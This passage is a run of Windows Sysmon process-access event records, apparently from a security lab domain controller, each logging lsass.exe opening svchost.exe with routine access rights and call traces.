C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.219","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1144,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.219\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.219","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1145,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1146,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1147,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1148,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1149,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1150,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
